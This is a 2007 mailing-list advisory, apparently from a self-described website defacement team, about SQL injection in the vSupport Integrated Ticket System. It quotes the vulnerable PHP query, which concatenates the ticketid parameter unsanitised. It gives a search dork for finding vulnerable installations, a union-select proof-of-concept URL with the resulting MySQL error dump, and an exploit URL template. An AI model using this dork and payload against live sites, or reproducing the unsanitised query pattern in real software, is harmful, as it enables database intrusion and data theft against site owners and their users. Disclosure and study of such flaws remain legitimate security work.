<<< Date Index >>>     <<< Thread Index >>>

vSupport Integrated Ticket System 3.*.* SQL injection

+--------------------------------------------------------------------
+
+ Affected Software .: vSupport Integrated Ticket System
+ Venedor ...........: http://www.cmgsccc.com 
+ Class .............: SQL injection
+ Dork ..............: inurl:vBSupport.php
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.sec-area.com/
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------
+ PoC:
+
+ Database error SQL
+--------------------------------------------------------------------
                // do not limit the users access
                $fromuseraccess = "";
        }

        // get the info about the ticket first
        if ($ticket = $db->query_first("
                SELECT ticket.*
                " . iif($vbulletin->options['privallowicons'], ",icon.title AS 
icontitle, icon.iconpath") . "
                FROM " . TABLE_PREFIX . "ticket as ticket
                " . iif($vbulletin->options['privallowicons'], "LEFT JOIN " . 
TABLE_PREFIX . "icon AS icon ON(icon.iconid = ticket.iconid)") . "
                WHERE ticketid=" . $vbulletin->GPC['ticketid'] . "
                $fromuseraccess
        "))
        {


+--------------------------------------------------------------------
+  An example:
+--------------------------------------------------------------------

http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/

+--------------------------------------------------------------------
+  output:
+--------------------------------------------------------------------

MySQL Error  : You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version for the right syntax to use near '' at 
line 5
Error Number : 1064


Date         : Monday, July 2nd 2007 @ 02:54:54 PM
Script       : 
http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/
Referrer     : 
IP Address   : 127.0.0.1
Username     : admin
Classname    : vb_database
Invalid SQL:

                SELECT ticket.*
                ,icon.title AS icontitle, icon.iconpath
                FROM ticket as ticket
                LEFT JOIN icon AS icon ON(icon.iconid = ticket.iconid)
                WHERE ticketid=1/**/union/**/select/**/;
+--------------------------------------------------------------------
+  Exploit :
+--------------------------------------------------------------------
http://localhost/4/vBSupport.php?do=showticket&ticketid=[SQL]

+--------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+--------------------------------------------------------------------
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE 
||
+ || Pro Hacker || - || DARKFIRE ||
+
+-------------------------[ W D T ]----------------------------------